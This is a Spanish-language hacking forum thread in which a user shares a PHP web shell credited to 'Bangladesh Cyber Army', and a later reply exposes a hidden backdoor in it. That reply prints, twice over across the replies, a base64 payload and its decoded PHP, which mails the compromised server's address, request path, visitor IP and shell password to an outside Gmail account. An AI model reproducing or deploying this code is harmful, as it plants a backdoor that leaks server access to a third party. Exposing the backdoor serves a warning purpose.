Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bangladesh Cyber Army Shell (BCA Private Shell)

  • 3 Respuestas
  • 3676 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado craventhegod

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • [C]raven [in]seguridad Informatica
« en: Junio 08, 2013, 04:29:05 pm »
buenas tardes, aquí les traigo una shell que espero les guste codeada por Bangladesh Cyber Army :P



 como se ve en la imagen sus funciones son muy directas y automatizadas,




enjoy it :P


solo pegala en un editor de texto plano y guardala como   .php
DESCARGA

aqui en pastebin
« Última modificación: Noviembre 23, 2014, 02:39:11 pm por Expermicid »
todo es relativo, hasta nuestra existencia :) Shalom

Desconectado D4rkC0d3r

  • *
  • Underc0der
  • Mensajes: 201
  • Actividad:
    0%
  • Reputación 0
  • \xeb\x16\x5e\x31\xd2\
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
« Respuesta #1 en: Junio 08, 2013, 07:46:43 pm »
Interesante, gracias por compartir!!  :D

Saludos!

D4rkC0d3r

Desconectado Andro1de

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Junio 08, 2013, 07:48:46 pm »
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Código: [Seleccionar]
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Desconectado morodog

  • *
  • Underc0der
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
  • Skype: MorodoG
  • Twitter: m4r4d4g
« Respuesta #3 en: Junio 09, 2013, 11:13:18 am »
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Código: [Seleccionar]
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Juasss xD no hace falta leer más código xD

 

¿Te gustó el post? COMPARTILO!



Python Web Shell WSO 0.1 - Undetectable By WAF

Iniciado por sm0ke

Respuestas: 0
Vistas: 3175
Último mensaje Mayo 17, 2018, 01:54:19 am
por sm0ke
[PHP] Worse Linux Shell

Iniciado por ANTRAX

Respuestas: 2
Vistas: 3591
Último mensaje Marzo 26, 2013, 05:40:49 pm
por Xt3mP
Reverse Shell Django

Iniciado por hdbreaker

Respuestas: 0
Vistas: 3544
Último mensaje Octubre 01, 2014, 12:40:08 am
por hdbreaker
Fenix Shell (C99 Traducido)

Iniciado por ANTRAX

Respuestas: 13
Vistas: 9739
Último mensaje Mayo 27, 2016, 12:28:12 pm
por blackdrake
Priv Shell Scanner!

Iniciado por Mayk0

Respuestas: 0
Vistas: 2903
Último mensaje Mayo 07, 2013, 08:45:20 pm
por Mayk0